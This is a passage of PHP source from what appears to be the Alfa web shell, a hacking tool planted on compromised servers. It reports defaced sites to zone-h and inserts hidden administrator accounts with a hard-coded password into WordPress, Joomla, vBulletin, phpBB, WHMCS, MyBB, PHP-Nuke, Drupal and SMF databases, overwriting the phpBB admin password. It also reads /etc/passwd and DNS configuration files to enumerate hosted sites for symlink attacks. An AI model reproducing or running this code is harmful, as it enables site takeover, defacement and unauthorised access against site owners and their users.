  3830. $sites[$i] = "http://".$sites[$i];
  3831. }
  3832. $alfa->Send("http://www.zone-h.com/notify/single","post","defacer=".$hacker."&domain1=". $sites[$i]."&hackmode=".$method."&reason=".$neden);
  3833. ++$i;
  3834. }
  3835. echo __pre()."<center><font color =\"#00A220\"><b>[+] Sending Sites To Zone-H Has Been Completed Successfully !!![+]</b><font></center>";
  3836. }
  3837. echo "</div>";
  3838. alfafooter();
  3839. }
  3840. function alfapwchanger(){
  3841. alfahead();
  3842. echo '<div class=header><center><br><div class="txtfont_header">| Add New Admin |</div>
  3843. <center><h3>';
  3844. $vals = array('WordPress' => array('wp',2),'Joomla' => array('joomla',3),'vBulletin' => array('vb',5),'phpBB' => array('phpbb',6),'WHMCS' => array('whmcs',7),'MyBB' => array('mybb',8),'Php Nuke' => array('nuke',9),'Drupal' => array('drupal',10),'SMF' => array('smf',11));
  3845. Alfa_Create_A_Tag('pwchanger',$vals);
  3846. echo '</h3></center>';
  3847. if(isset($_POST['alfa1'])&&$_POST['alfa1']=='wp'){
  3848. echo __pre().'<center><center><div class="txtfont_header">| WordPress |</div>
  3849. <p>'.getConfigHtml('wp').'</p><form onSubmit="g(\'pwchanger\',null,\'wp\',\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">';
  3850. $table = array('td1' =>
  3851. array('color' => 'FFFFFF', 'tdName' => 'Mysql Host','id'=>'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
  3852. 'td2' =>
  3853. array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
  3854. 'td3' =>
  3855. array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
  3856. 'td4' =>
  3857. array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
  3858. 'td5' =>
  3859. array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'wp_', 'inputSize' => '50'),
  3860. 'td6' =>
  3861. array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
  3862. 'td7' =>
  3863. array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'kh', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
  3864. 'td8' =>
  3865. array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
  3866. );
  3867. create_table($table);
  3868. echo '<p><input value=" " name="send" type="submit"></p></form>';
  3869. if ($_POST['alfa2'] && $_POST['alfa2'] == '>>'){
  3870. $localhost = $_POST['alfa3'];
  3871. $database = $_POST['alfa4'];
  3872. $username = $_POST['alfa5'];
  3873. $password = $_POST['alfa6'];
  3874. $admin = $_POST['alfa8'];
  3875. $SQL = $_POST['alfa9'];
  3876. $prefix = $_POST['alfa10'];
  3877. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
  3878. $solevisible=@mysqli_query($conn,"insert into ".$prefix."users (ID,user_login,user_pass,user_email) values(null,'$admin','d4a590caacc0be55ef286e40a945ea45','$SQL')") or die(mysqli_error($conn));
  3879. $solevisible=@mysqli_query($conn,"select ID from ".$prefix."users where user_login='".$admin."'") or die(mysqli_error($conn));
  3880. $sole = @mysqli_num_rows($solevisible);
  3881. if ($sole == 1){
  3882. $solevis = @mysqli_fetch_assoc($solevisible);
  3883. $res = $solevis['ID'];
  3884. }
  3885. $solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','first_name','solevisible'),(null,'".$res."','last_name','solevisible'),(null,'".$res."','nickname','solevisible'),(null,'".$res."','description','solevisible'),(null,'".$res."','rich_editing','true'),(null,'".$res."','comment_shortcuts','false'),(null,'".$res."','admin_color','fresh'),(null,'".$res."','use_ssl','0'),(null,'".$res."','show_admin_bar_front','true'),(null,'".$res."','".$prefix."capabilities','a:1:{s:13:\"administrator\";b:1;}'),(null,'".$res."','".$prefix."user_level','10'),(null,'".$res."','show_welcome_panel','1'),(null,'".$res."','".$prefix."dashboard_quick_press_last_post_id','3')") or die(mysqli_error($conn));
  3886. if($solevisible){
  3887. __alert('Success... '.$admin.' is created...');}
  3888. }
  3889. }
  3890. if($_POST['alfa2'] && $_POST['alfa2'] == 'joomla'){
  3891. echo __pre().'<center><center><div class="txtfont_header">| Joomla |</div><p><p>'.getConfigHtml('joomla').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',\'joomla\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">';
  3892. $table = array('td1' =>
  3893. array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
  3894. 'td2' =>
  3895. array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
  3896. 'td3' =>
  3897. array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
  3898. 'td4' =>
  3899. array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
  3900. 'td5' =>
  3901. array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'jos_', 'inputSize' => '50'),
  3902. 'td6' =>
  3903. array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
  3904. 'td7' =>
  3905. array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
  3906. 'td8'=>
  3907. array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
  3908. );
  3909. create_table($table);
  3910. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
  3911. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
  3912. $localhost = $_POST['alfa3'];
  3913. $database = $_POST['alfa4'];
  3914. $username = $_POST['alfa5'];
  3915. $password = $_POST['alfa6'];
  3916. $admin = $_POST['alfa8'];
  3917. $SQL = $_POST['alfa9'];
  3918. $prefix = $_POST['alfa10'];
  3919. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
  3920. $solevisible=@mysqli_query($conn,"insert into ".$prefix."users (id,name,username,email,password) values(null,'Super User','".$admin."','".$SQL."','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
  3921. $solevisible=@mysqli_query($conn,"select id from ".$prefix."users where username='".$admin."'") or die(mysqli_error($conn));
  3922. $sole =@mysqli_num_rows($solevisible);
  3923. if ($sole == 1){
  3924. $solevis =@mysqli_fetch_assoc($solevisible);
  3925. $res = $solevis['id'];
  3926. }
  3927. $solevisible=@mysqli_query($conn,"INSERT INTO ".$prefix."user_usergroup_map (user_id,group_id) VALUES ('".$res."', '8')") or die(mysqli_error($conn));
  3928. if($solevisible){
  3929. __alert('Success... '.$admin.' is created...');}
  3930. }
  3931. }
  3932. if($_POST['alfa4'] && $_POST['alfa4'] == 'vb'){
  3933. echo __pre().'<center><center><div class="txtfont_header">| vBulletin |<div><p>'.getConfigHtml('vb').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,\'vb\',this.username.value,this.password.value,this.prefix.value,this.admin.value,this.email.value); return false;" method="POST">';
  3934. $table = array('td1' =>
  3935. array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
  3936. 'td2' =>
  3937. array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
  3938. 'td3' =>
  3939. array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
  3940. 'td4' =>
  3941. array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
  3942. 'td5' =>
  3943. array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
  3944. 'td6' =>
  3945. array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
  3946. 'td7' =>
  3947. array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
  3948. 'td8' =>
  3949. array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
  3950. );
  3951. create_table($table);
  3952. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
  3953. if($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
  3954. $localhost = $_POST['alfa2'];
  3955. $database = $_POST['alfa3'];
  3956. $username = $_POST['alfa5'];
  3957. $password = $_POST['alfa6'];
  3958. $prefix = $_POST['alfa7'];
  3959. $admin = $_POST['alfa8'];
  3960. $SQL = $_POST['alfa9'];
  3961. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_connect_error());
  3962. $pw_col = @mysqli_connect("SELECT column_name FROM information_schema.columns where table_name = '{$prefix}user' and column_name = 'password' and table_schema = '{$database}'");
  3963. $pw_col = @mysqli_num_rows($pw_col);
  3964. $adm_perm = "16744444";
  3965. if($pw_col > 0){
  3966. $solevisible=@mysqli_query($conn,"insert into {$prefix}user (userid,usergroupid,username,password,salt,email,passworddate,joindate) values(null,'6','$admin','52e28b78f55641cd4618ad1a20f5fd5c','Xw|IbGLhTQA-AwApVv>61y^(z]*<QN','$SQL','".date('Y-m-d')."','".time()."')") or die(mysqli_error($conn));
  3967. }else{
  3968. $adm_perm = "2143256444";
  3969. $solevisible=@mysqli_query($conn,"insert into {$prefix}user (userid,usergroupid,username,token,secret,email,passworddate,joindate,scheme,birthday_search) values(null,'6','$admin','\$2y\$10\$YsVhV.9tLnzBYxar1BJAGO3vFz68/qDU7Jt62SDdLy6lUT9N5Z/wq','Qf~ADeA}iAey-&#ALQF<}/uBDqSnw>','$SQL','".date('Y-m-d')."','".time()."','blowfish:10','1984-05-20')") or die(mysqli_error($conn));
  3970. }
  3971. $solevisible=@mysqli_query($conn,"select userid from {$prefix}user where username='".$admin."'") or die(mysqli_error($conn));
  3972. $sole = mysqli_num_rows($solevisible);
  3973. if($sole == 1){
  3974. $solevis = mysqli_fetch_assoc($solevisible);
  3975. $res = $solevis['userid'];
  3976. }
  3977. $solevisible=@mysqli_query($conn,"insert into {$prefix}administrator (userid,adminpermissions) values('".$res."','".$adm_perm."')") or die(mysqli_error($conn));
  3978. if($solevisible){
  3979. __alert('Success... '.$admin.' is created...');}
  3980. }
  3981. }
  3982. if(isset($_POST['alfa5']) && $_POST['alfa5'] == 'phpbb'){
  3983. echo __pre().'<center><div class="txtfont_header">| phpBB |</div><p><p>'.getConfigHtml('phpbb').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,\'phpbb\',this.password.value,null,this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">';
  3984. $table = array('td1' =>
  3985. array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
  3986. 'td2' =>
  3987. array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
  3988. 'td3' =>
  3989. array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
  3990. 'td4' =>
  3991. array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
  3992. 'td5' =>
  3993. array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
  3994. 'td6' =>
  3995. array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
  3996. 'td7' =>
  3997. array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
  3998. 'td8' =>
  3999. array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
  4000. );
  4001. create_table($table);
  4002. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
  4003. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
  4004. $localhost = $_POST['alfa2'];
  4005. $database = $_POST['alfa3'];
  4006. $username = $_POST['alfa4'];
  4007. $password = $_POST['alfa6'];
  4008. $admin = $_POST['alfa8'];
  4009. $SQL = $_POST['alfa9'];
  4010. $prefix = $_POST['alfa10'];
  4011. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
  4012. $hash = md5('solevisible');
  4013. $solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
  4014. $solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
  4015. $solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE user_type = 3") or die(mysqli_error($conn));
  4016. $solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE user_type = 3") or die(mysqli_error($conn));
  4017. $solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_email ='".$SQL."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
  4018. if($solevisible){
  4019. __alert('Success... '.$admin.' is created...');
  4020. }
  4021. }
  4022. }
  4023. if(isset($_POST['alfa6']) && $_POST['alfa6'] == 'whmcs'){
  4024. echo __pre().'<center><div class="txtfont_header">| Whmcs |</div><p><p>'.getConfigHtml('whmcs').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,\'whmcs\',null,this.admin.value,this.email.value); return false;" method="POST">';
  4025. $table = array('td1' =>
  4026. array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' =>'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
  4027. 'td2' =>
  4028. array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
  4029. 'td3' =>
  4030. array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
  4031. 'td4' =>
  4032. array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
  4033. 'td6' =>
  4034. array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
  4035. 'td7' =>
  4036. array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
  4037. 'td8' =>
  4038. array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
  4039. );
  4040. create_table($table);
  4041. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
  4042. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
  4043. $localhost = $_POST['alfa2'];
  4044. $database = $_POST['alfa3'];
  4045. $username = $_POST['alfa4'];
  4046. $password = $_POST['alfa5'];
  4047. $admin = $_POST['alfa8'];
  4048. $SQL = $_POST['alfa9'];
  4049. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
  4050. $solevisible=@mysqli_query($conn,"insert into tbladmins (id,roleid,username,password,email,template,homewidgets) values(null,'1','".$admin."','d4a590caacc0be55ef286e40a945ea45','".$SQL."','blend','getting_started:true,orders_overview:true,supporttickets_overview:true,my_notes:true,client_activity:true,open_invoices:true,activity_log:true|income_overview:true,system_overview:true,whmcs_news:true,sysinfo:true,admin_activity:true,todo_list:true,network_status:true,income_forecast:true|')") or die(mysqli_error($conn));
  4051. if($solevisible){
  4052. __alert('Success... '.$admin.' is created...');}
  4053. }
  4054. }
  4055. if(isset($_POST['alfa7']) && $_POST['alfa7'] == 'mybb'){
  4056. echo __pre().'<center><div class="txtfont_header">| Mybb |</div><p><p>'.getConfigHtml('mybb').'</p><form onsubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,\'mybb\',this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">';
  4057. $table = array('td1' =>
  4058. array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
  4059. 'td2' =>
  4060. array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
  4061. 'td3' =>
  4062. array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
  4063. 'td4' =>
  4064. array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
  4065. 'td5' =>
  4066. array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
  4067. 'td6' =>
  4068. array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
  4069. 'td7' =>
  4070. array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
  4071. 'td8' =>
  4072. array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
  4073. );
  4074. create_table($table);
  4075. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
  4076. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
  4077. $localhost = $_POST['alfa2'];
  4078. $database = $_POST['alfa3'];
  4079. $username = $_POST['alfa4'];
  4080. $password = $_POST['alfa5'];
  4081. $admin = $_POST['alfa8'];
  4082. $SQL = $_POST['alfa9'];
  4083. $prefix = $_POST['alfa10'];
  4084. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
  4085. $solevisible=@mysqli_query($conn,"insert into ".$prefix."users (uid,username,password,salt,email,usergroup) values(null,'".$admin."','e71f2c3265619038d826a1ac6e2b9b8e','ywza68lS','".$SQL."','4')") or die(mysqli_error($conn));
  4086. if($solevisible){
  4087. __alert('Success... '.$admin.' is created...');}
  4088. }
  4089. }
  4090. if(isset($_POST['alfa8']) && $_POST['alfa8'] == 'nuke'){
  4091. echo __pre().'<center><div class="txtfont_header">| PhpNuke |</div><p><p>'.getConfigHtml('phpnuke').'</p><form onsubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'nuke\',this.email.value,this.prefix.value); return false;" method="POST">';
  4092. $table = array('td1' =>
  4093. array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
  4094. 'td2' =>
  4095. array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
  4096. 'td3' =>
  4097. array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
  4098. 'td4' =>
  4099. array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
  4100. 'td5' =>
  4101. array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
  4102. 'td6' =>
  4103. array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
  4104. 'td7' =>
  4105. array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
  4106. 'td8' =>
  4107. array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
  4108. );
  4109. create_table($table);
  4110. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
  4111. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
  4112. $localhost = $_POST['alfa2'];
  4113. $database = $_POST['alfa3'];
  4114. $username = $_POST['alfa4'];
  4115. $password = $_POST['alfa5'];
  4116. $admin = $_POST['alfa7'];
  4117. $SQL = $_POST['alfa9'];
  4118. $prefix = $_POST['alfa10'];
  4119. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
  4120. $hash = md5($pwd);
  4121. $solevisible=@mysqli_query($conn,"insert into ".$prefix."_authors(aid,name,email,pwd) values('$admin','God','$SQL','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
  4122. if($solevisible){
  4123. __alert('Success... '.$admin.' is created...');}
  4124. }
  4125. }
  4126. if(isset($_POST['alfa9']) && $_POST['alfa9'] == 'drupal'){
  4127. echo __pre().'<center><div class="txtfont_header">| Drupal |</div><p><p>'.getConfigHtml('drupal').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,null,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'drupal\'); return false;" method="POST">';
  4128. $table = array('td1' =>
  4129. array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
  4130. 'td2' =>
  4131. array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
  4132. 'td3' =>
  4133. array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
  4134. 'td4' =>
  4135. array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
  4136. 'td6' =>
  4137. array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
  4138. 'td7' =>
  4139. array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true)
  4140. );
  4141. create_table($table);
  4142. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
  4143. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
  4144. $localhost = $_POST['alfa2'];
  4145. $database = $_POST['alfa4'];
  4146. $username = $_POST['alfa5'];
  4147. $password =$_POST['alfa6'];
  4148. $admin = $_POST['alfa8'];
  4149. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
  4150. $getDescuid = @mysqli_query($conn,"select uid from users order by uid desc limit 0,1");
  4151. $getDescuid = @mysqli_fetch_assoc($getDescuid);
  4152. $getDescuid = $getDescuid['uid'];
  4153. $getdescuid = $getDescuid++;
  4154. $solevisible=@mysqli_query($conn,"insert into users (uid,name,pass,mail,signature_format,status,timezone,init) values('$getDescuid','$admin','\$S\$DP2y9AbolCBOd\/WyQcpzu4zF57qE0noyCNeXZWv.37R66VsFjOiC','solevisible@fbi.gov','filtered_html','1','Europe/Berlin','solevisible@fbi.gov')") or die(mysqli_error($conn));
  4155. $solevisible=@mysqli_query($conn,"select uid from users where name='".$admin."'") or die(mysqli_error($conn));
  4156. $sole = mysqli_num_rows($solevisible);
  4157. if ($sole == 1){
  4158. $solevis = mysqli_fetch_assoc($solevisible);
  4159. $res = $solevis['uid'];
  4160. }
  4161. $solevisible=@mysqli_query($conn,"INSERT INTO users_roles (uid,rid) VALUES ('".$res."', '3')") or die(mysqli_error($conn));
  4162. if($solevisible){
  4163. __alert('Success... '.$admin.' is created...');}
  4164. }
  4165. }
  4166. if(isset($_POST['alfa10']) && $_POST['alfa10'] == 'smf'){
  4167. echo __pre().'<center><center><div class="txtfont_header">| SMF |</div><p><p>'.getConfigHtml('smf').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,null,this.username.value,this.password.value,this.prefix.value,this.admin.value,null,\'smf\'); return false;" method="POST">';
  4168. $table = array('td1' =>
  4169. array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
  4170. 'td2' =>
  4171. array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
  4172. 'td3' =>
  4173. array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
  4174. 'td4' =>
  4175. array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
  4176. 'td5' =>
  4177. array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'smf_', 'inputSize' => '50'),
  4178. 'td6' =>
  4179. array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
  4180. 'td7' =>
  4181. array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
  4182. );
  4183. create_table($table);
  4184. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
  4185. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
  4186. $localhost = $_POST['alfa2'];
  4187. $database = $_POST['alfa3'];
  4188. $username = $_POST['alfa5'];
  4189. $password = $_POST['alfa6'];
  4190. $prefix = $_POST['alfa7'];
  4191. $admin = $_POST['alfa8'];
  4192. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
  4193. $setpwAlg = sha1(strtolower($admin) . 'solevisible');
  4194. $solevisible=@mysqli_query($conn,"insert into {$prefix}members (id_member,member_name,id_group,real_name,passwd,email_address) values(null,'$admin','1','$admin','$setpwAlg','solevisible@fbi.gov')") or die(mysqli_error($conn));
  4195. if($solevisible){
  4196. __alert('Success... '.$admin.' is created...');}
  4197. }
  4198. }
  4199. echo "</div>";
  4200. alfafooter();
  4201. }
  4202. function alfaMakePwd(){
  4203. if(_alfa_file_exists("/etc/virtual/domainowners")||(_alfa_file_exists("/etc/named.conf")&&_alfa_file_exists("/etc/valiases"))){
  4204. return "/home/{user}/public_html/";
  4205. }
  4206. $document = explode("/", $_SERVER["DOCUMENT_ROOT"]);
  4207. $public = end($document);
  4208. array_pop($document);
  4209. array_pop($document);
  4210. $path = implode("/", $document) . "/{user}/" . $public;
  4211. return $path;
  4212. }
  4213. function alfaGetDomains($state = false){
  4214. $state = "named.conf";
  4215. $lines = array();
  4216. $lines = _alfa_file('/etc/named.conf');
  4217. if(!$lines){
  4218. $lines = @scandir("/etc/valiases/");
  4219. $state = "valiases";
  4220. if(!$lines){
  4221. $lines = @scandir("/var/named");
  4222. $state = "named";
  4223. if(!$lines && $state){
  4224. $lines = _alfa_file('/etc/passwd');
  4225. $state = "passwd";
  4226. }
  4227. }
  4228. }
  4229. return array("lines" => $lines, "state" => $state);
  4230. }
  4231. function alfaCreateParentFolder(){
  4232. $parent = $GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__;
  4233. if(!@is_dir($parent)){
  4234. @mkdir($parent, 0755, true);
  4235. }
  4236. }
  4237. function alfasymlink(){
  4238. alfahead();
  4239. AlfaNum(9,10);
  4240. alfaCreateParentFolder();
  4241. @chdir($GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__);
